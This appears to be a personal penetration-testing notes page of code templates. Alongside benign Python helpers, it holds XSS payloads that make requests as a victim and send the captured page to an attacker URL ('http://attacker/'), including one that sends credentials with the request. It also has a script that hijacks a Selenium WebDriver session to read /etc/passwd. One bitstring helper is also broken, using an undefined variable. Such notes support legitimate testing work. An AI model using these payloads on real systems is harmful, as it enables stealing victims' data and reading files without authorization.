xct's notes
Search…
Templates

Post request with session

1
import requests
2
import re
3
4
http_proxy = "http://127.0.0.1:8080"
5
proxyDict = {
6
"http" : http_proxy,
7
}
8
# get a session
9
r = requests.get('http://')
10
# send request
11
r = requests.post('<url>', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)
Copied!

XSS web request on behalf of victim, sending complete webpage back

1
xhr = new XMLHttpRequest();
2
xhr.onload = function() {
3
x = new XMLHttpRequest();
4
x.open("GET", '<our_url>?'+xhr.response);
5
x.send(null);
6
}
7
xhr.open("GET", '<target_url>');
8
xhr.send(null);
Copied!
Alternative using fetch:
1
fetch('http://target', { credentials: 'include'}).then(res=>res.text()).then((r)=>fetch("http://attacker/?x="/*+btoa(r)*/,{credentials: 'include', "method":"POST", "body":btoa(r)}));
Copied!

XSS post request on behalf of the victim, with custom cookies

1
var xhr = new XMLHttpRequest();
2
document.cookie = "key=value;";
3
var uri ="<target uri>";
4
xhr = new XMLHttpRequest();
5
xhr.open("POST", uri, true);
6
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
7
xhr.send("<post body>");
Copied!

Manipulate bitstring

1
# Convert bit string to byte array
2
def bitstring_to_bytes(s):
3
v = int(s, 2)
4
b = bytearray()
5
while v:
6
b.append(v & 0xff)
7
v >>= 8
8
return bytes(b[::-1])
9
10
base = "010101..." # the bit string
11
n = 8 # change something every n bits
12
result = ""
13
# Iterate over bitstring, doing something every n bits
14
for i in xrange(n,len(base)-n,n):
15
# do manipulation here
16
result += num
17
print(bitstring_to_bytes(result))
Copied!

Named capture groups

1
m = re.search('[e]\s:\s(?P<e>\d+){0,1}',text.decode('utf-8'))
2
if m != None and 'e' in m.groupdict():
3
e = int(m.group('e'))
Copied!

Use Selenium to read local files

1
'''
2
curl -d '{"capabilities": {"firstMatch": [{"browserName": "firefox", "moz:firefoxOptions": {"args": [ "-headless"], "log": {"level": "trace"}}}]}}' http://127.0.0.1:41145/session
3
'''
4
from selenium import webdriver
5
from selenium.webdriver.remote.webdriver import WebDriver
6
7
def attach_to_session(executor_url, session_id):
8
original_execute = WebDriver.execute
9
def new_command_execute(self, command, params=None):
10
if command == "newSession":
11
return {'success': 0, 'value': None, 'sessionId': session_id}
12
else:
13
return original_execute(self, command, params)
14
WebDriver.execute = new_command_execute
15
driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})
16
driver.session_id = session_id
17
WebDriver.execute = original_execute
18
return driver
19
20
bro = attach_to_session('http://127.0.0.1:41145', 'bb2d2142-8a61-446b-9bcc-16751ce20b49')
21
bro.get('file:///etc/passwd')
22
print(bro.page_source)
Copied!
Last modified 10mo ago